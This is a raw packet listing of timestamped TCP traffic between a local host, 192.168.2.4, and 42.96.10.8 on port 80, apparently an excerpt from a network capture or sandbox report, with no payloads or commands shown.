                                                                                                                                                                                                            Nov 13, 2024 13:25:18.878412008 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.878427982 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.878438950 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.878442049 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.878457069 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.878460884 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.878478050 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.878494024 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.878511906 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.878515959 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.878515959 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.878529072 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.878551960 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.878561974 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.878577948 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.878592014 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.878608942 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.878609896 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.878628016 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.878643990 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.878660917 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.878664017 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.878664017 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.878679991 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.878700972 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.878726959 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.878770113 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.878786087 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.878802061 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.878823042 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.878823042 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.878870964 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.878906012 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.878909111 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.878921032 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.878983021 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.879000902 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.879008055 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.879062891 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.879105091 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.879132032 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.879158974 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.879173994 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.879189014 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.879204988 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.879210949 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.879210949 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.879220963 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.879237890 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.879252911 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.879270077 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.879272938 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.879272938 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.879306078 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.879338026 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.879352093 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.879374981 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.879375935 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.879426956 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.879442930 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.879461050 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.879478931 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.879487991 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.879566908 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.879611969 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.879611969 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.879642963 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.879658937 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.879702091 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.879717112 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.879734039 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.879749060 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.879760981 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.879760981 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.879765034 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.879821062 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.879851103 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.879861116 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.879874945 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.879892111 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.879906893 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.879983902 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.880021095 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.880037069 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.880063057 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.880078077 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.880094051 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.880100965 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.880100965 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.880134106 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.880146027 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.880181074 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.880198002 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.880247116 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.880263090 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.880286932 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.880286932 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.880387068 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.880402088 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.880429983 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.880445957 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.880460978 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.880467892 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.880467892 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.880598068 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.923059940 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.923079967 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.923095942 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.923114061 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.923155069 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.923181057 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.923357964 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.923387051 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.923401117 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.923417091 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.923444986 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.923454046 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.923454046 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.923464060 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.923481941 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.923495054 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.923511982 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.923521042 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.923527002 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.923544884 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.923564911 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.923564911 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.923618078 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.923631907 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.923751116 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.976453066 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.976480007 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.976499081 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.976506948 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.976561069 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.977385998 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.977402925 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.977418900 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.977449894 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.995563984 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.995594978 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.995609999 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.995611906 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.995716095 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.995738029 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.995764971 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.995779037 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.995780945 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.995779037 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.995803118 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.995816946 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.995820045 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.995846033 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.995861053 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.995876074 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.995888948 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.995892048 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.995910883 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.995913029 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.995928049 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.995966911 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.995966911 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.995995045 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.996011972 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.996107101 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.996149063 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.996165991 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.996181011 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.996190071 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.996205091 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.996218920 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.996236086 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.996238947 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.996249914 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.996267080 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.996284962 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.996311903 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.996311903 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.996406078 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.996421099 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.996436119 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.996463060 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.996476889 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.996480942 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.996480942 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.996495008 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.996546030 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.996561050 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.996576071 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.996583939 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.996583939 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.996608019 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.996624947 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.996639967 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.996656895 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.996664047 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.996664047 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.996670961 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.996689081 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.996707916 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.996723890 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.996727943 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.996727943 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.996768951 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.996807098 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.996823072 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.996838093 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.996854067 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.996865034 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.996910095 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.996941090 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.996957064 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.996973038 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.996989012 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.996995926 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.997006893 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.997034073 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.997435093 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.997453928 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.997472048 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.997518063 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.997518063 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.997539997 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.997556925 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.997571945 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.997587919 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.997605085 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.997625113 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.997625113 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.997694969 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.997721910 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.997736931 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.997752905 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.997766972 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.997773886 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.997773886 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.997781992 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.997797966 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.997814894 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.997828960 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.997837067 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.997837067 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.997845888 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.997864008 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.997893095 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.997894049 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.997966051 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.997982025 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.997997046 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.998012066 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.998027086 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.998043060 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.998058081 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.998058081 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.998137951 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.998153925 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.998153925 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.998171091 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.998187065 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.998203993 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.998224020 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:18.998224020 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.038222075 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.038243055 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.038352013 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.038532019 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.038548946 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.038564920 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.038608074 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.038608074 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.038961887 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.039047003 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.039062023 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.039078951 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.039088964 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.039096117 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.039125919 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.039140940 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.039156914 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.039164066 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.039170027 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.039170027 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.039227962 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.082024097 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.082045078 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.082062006 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.082077980 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:19.082099915 CET4973380192.168.2.442.96.10.8
